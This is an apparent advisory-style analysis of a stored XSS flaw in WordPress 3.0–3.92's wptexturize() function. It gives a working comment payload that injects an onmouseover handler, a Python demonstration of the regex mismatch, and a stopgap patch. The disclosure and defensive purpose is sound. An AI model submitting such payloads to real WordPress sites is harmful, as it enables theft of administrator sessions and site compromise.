WordPress 3.0-3.92 stored XSS Vulnerability Analysis & POC
Overview:
WordPress is a blog platform written in PHP; you can run your own website on any server that supports PHP and a MySQL database. WordPress is also widely used as a content management system (CMS).
A stored XSS vulnerability was recently disclosed in WordPress versions up to and including 3.92. An attacker who exploits it can steal an administrator's cookies and, with that session, upload malicious files.
Details:
The problem lies in WordPress comments. A comment may contain a limited set of HTML tags, such as <a>, <b> and <code>, and only whitelisted attributes inside those tags: the <a> tag may carry an href attribute, for example, but an onmouseover attribute is not allowed.
The weakness is in the string formatting function wptexturize(), which is run on every comment when it is displayed. It converts certain characters into HTML entities, for example turning plain quotation marks into their typographic entity forms. So as not to disturb the HTML markup, wptexturize() first splits the text into chunks at every HTML tag; besides HTML tags, it also treats square-bracket shortcodes such as [code] as boundaries. The split is performed by the following regular expression.
In wp-includes/formatting.php, inside wptexturize():
$textarr = preg_split('/(<.*>|\[.*\])/Us', $text, -1, PREG_SPLIT_DELIM_CAPTURE);
However, when angle brackets < > and square brackets [ ] are interleaved in a comment, the two alternatives of this regex carve the text up differently from the HTML structure the comment sanitizer saw. The chunks the split treats as tags are left untouched, while quotation marks in the remaining chunks are converted to entities; a quote that closed an attribute value for the sanitizer can therefore disappear from the rendered output, so the browser sees a different attribute boundary and an event handler that the whitelist never allowed. The result is stored XSS.
Poc:
Submit the following as a comment:
[<a href="xxx" title="]"></a>[" <!-- onmouseover=alert(/xss/)//><!-- -->XSS<a></a>]
The injected JavaScript executes both on the front end (the public post page) and in the admin back end (the comment moderation screens), where it runs in the administrator's session.
[Screenshot: front end]
[Screenshot: back end]
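As an added illustration (not part of the original write-up), the following Python script ports the preg_split() call above and feeds it the PoC comment, showing which chunks wptexturize() skips and how the quote conversion moves an attribute boundary so that a browser-style parser sees the injected onmouseover on the <a> tag. The quote handling is a constructed simplification of wptexturize(), and Python's HTMLParser stands in for the browser.

```python
import re
from html.parser import HTMLParser

# Port of the split in wptexturize(): PHP's /(<.*>|\[.*\])/Us is ungreedy (U)
# with dot matching newlines (s). re.split with one capturing group returns
# the delimiters at odd indices, as PREG_SPLIT_DELIM_CAPTURE does.
SPLIT_RE = re.compile(r'(<.*?>|\[.*?\])', re.DOTALL)

# The PoC comment from the write-up, embedded here as the sample input.
POC = '[<a href="xxx" title="]"></a>[" <!-- onmouseover=alert(/xss/)//><!-- -->XSS<a></a>]'


def split_like_wptexturize(text):
    """Return (segment, is_delimiter) pairs. Delimiters are the tag-like
    chunks wptexturize() skips; only the other segments get texturized."""
    parts = SPLIT_RE.split(text)
    return [(part, i % 2 == 1) for i, part in enumerate(parts)]


def texturize(text):
    """Constructed stand-in for wptexturize(): only its quote handling is
    modelled (every straight double quote becomes the entity &#8221;), since
    that is the step this bug depends on. The real function does much more."""
    return ''.join(seg if is_delim else seg.replace('"', '&#8221;')
                   for seg, is_delim in split_like_wptexturize(text))


class AnchorAttrs(HTMLParser):
    """Collect the attributes of every <a> start tag, as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.anchors = []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            self.anchors.append(dict(attrs))


def anchor_attrs(html):
    parser = AnchorAttrs()
    parser.feed(html)
    parser.close()
    return parser.anchors


if __name__ == '__main__':
    for seg, is_delim in split_like_wptexturize(POC):
        print('skipped   ' if is_delim else 'texturized', repr(seg))
    # What the sanitizer saw: <a> carries only href and title.
    print(anchor_attrs(POC))
    # What the browser sees after texturizing: the quote that closed
    # title="]" is now an entity, so onmouseover lands on the <a> tag.
    print(anchor_attrs(texturize(POC)))
```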
Affected versions:
3.0-3.92
Solution:
As a stopgap, edit wptexturize() in wp-includes/formatting.php so that it returns its input unchanged, by adding a return statement in front of the existing global line:
function wptexturize( $text ) {
    return $text; // added: skip texturizing entirely (stopgap)
    global $wp_cockneyreplace;
    // ... the rest of the original function body is now unreachable
}
This switches off every typographic replacement (curly quotes, dashes and so on) for the whole site, so it should only bridge the gap until the installation is updated to a WordPress release that fixes wptexturize().